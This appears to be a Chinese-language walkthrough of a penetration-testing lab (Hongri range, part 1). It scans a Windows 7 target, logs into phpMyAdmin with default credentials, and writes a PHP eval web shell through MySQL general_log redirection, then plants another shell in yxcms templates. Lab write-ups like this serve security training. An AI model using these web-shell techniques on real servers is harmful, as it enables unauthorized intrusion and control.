1. 程式人生 > 其它 >紅日靶場(內網滲透)——1

紅日靶場(內網滲透)——1

1.靶機資訊。

win7 x64:ip:192.168.248.129

2008: ip:192.168.138

win2k3:192.168.52.141

攻擊機資訊:

kali:整合各種攻擊工具  ip:192.168.248.128

win10:主要進行資料整理。

2.資訊蒐集。

1)使用kali掃描靶機

netdiscover -r 靶機IP網段

 發現win7外網網址為:192.168.248.129

對192.168.248.129進行埠掃描。

 發現開放埠80及3306.

確定使用HTTP和MYSQL服務。確定思路,使用SQL注入進行提權。

2)網站資訊蒐集

對網目錄進行掃描,發現phpmyadmin頁面:

 同時發現網站頁面底部有mysql的連線測試檢測:

 嘗試root/root,連線成功:

 利用之前得到的資訊,直接登入phpmyadmin,直接對mysql進行管理:

 3)利用sql進行getshell

利用步驟:

1.利用日誌檔案。

開啟日誌記錄以及日誌儲存目錄

SHOW VARIABLES LIKE '%general_log%'
SET GLOBAL general_log = "ON"

 將日誌檔案儲存為php檔案

SET GLOBAL general_log_file="C:/phpStudy/www/1.php"

2.利用一句話馬

執行一句話馬

SELECT '<?php eval($_POST["cmd"]);?>';

 利用菜刀進行連線:

 發現beifen.rar,應該為網站原始碼,下載檢視。

 開啟/yxcms/index.php,發現使用者名稱admin和密碼123456:

 登入,發現可以進行前臺模板管理,注入一句話馬:

 通過beifen.rar確定路徑後,菜刀連線,至此win7許可權已經獲取完畢。之後進行內網滲透,請見下一篇文章。